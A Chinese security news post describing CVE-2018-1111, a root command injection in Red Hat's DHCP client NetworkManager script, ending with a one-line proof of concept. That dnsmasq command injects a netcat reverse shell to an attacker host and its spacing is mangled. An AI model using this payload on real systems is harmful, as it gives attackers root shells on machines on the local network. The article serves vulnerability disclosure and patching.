Red Hat Linux DHCP远程root命令注入漏洞

  • A+
所属分类:网络安全新闻

红帽企业版Linux中DHCP客户端的一个严重漏洞可能允许攻击者在受影响的系统上执行任意命令。

Red Hat Linux DHCP远程root命令注入漏洞

跟踪为CVE-2018-1111,安全漏洞由Google安全团队的Felix Wilhelm报告。该错误是在DHCP客户端软件包中包含的NetworkManager集成脚本中发现的。

该漏洞具有7.5的CVSS3基本分数,并且可以在没有特殊权限的情况下被利用。但是,针对该漏洞的攻击者可以在容易受到攻击的红帽系统上以root权限执行任意命令。

通过DHCP协议,可以使用中央服务器配置主机中的网络相关信息。当连接到网络时,主机可以发出DHCP请求来获取网络配置参数,例如IP地址,默认路由器IP,DNS服务器等。

Red Hat中的DHCP客户端软件包包含NetworkManager组件的脚本。每次NetworkManager从DHCP服务器收到DHCP响应时都会执行该脚本。因此,可以使用恶意的DHCP响应来使脚本执行任意的shell命令。

“一个恶意的DHCP服务器或本地网络上的一个攻击者能够伪造DHCP响应,可以使用这个漏洞在使用NetworkManager的系统上执行具有root特权的任意命令,并配置为使用DHCP协议获取网络配置。”Red Hat 解释道。

CVE 2018-1111是一个非常高危的DHCP远程root命令注。漏洞利用符合推文,所以你应该尽快打补丁。

概念版Poc:

  1. #CVE -2018-1111 tweetable PoC :) dnsmasq --interface = eth0 --bind-interfaces --except-interface = lo --dhcp-range = 10.1.1.1,10.1.1.10,1h --conf-file = / dev / null --dhcp-option = 6,10.1.1.1 --dhcp-option = 3,10.1.1.1 --dhcp-option =“252,x'&nc -e / bin / bash 10.1.1.1 1337#”cc :
  • 服务器购买微信群
  • 阿里云&腾讯云&国外VPS
  • weinxin
  • 服务器购买QQ群
  • 阿里云&腾讯云&国外VPS
  • weinxin
CE安全网

发表评论

您必须登录才能发表评论!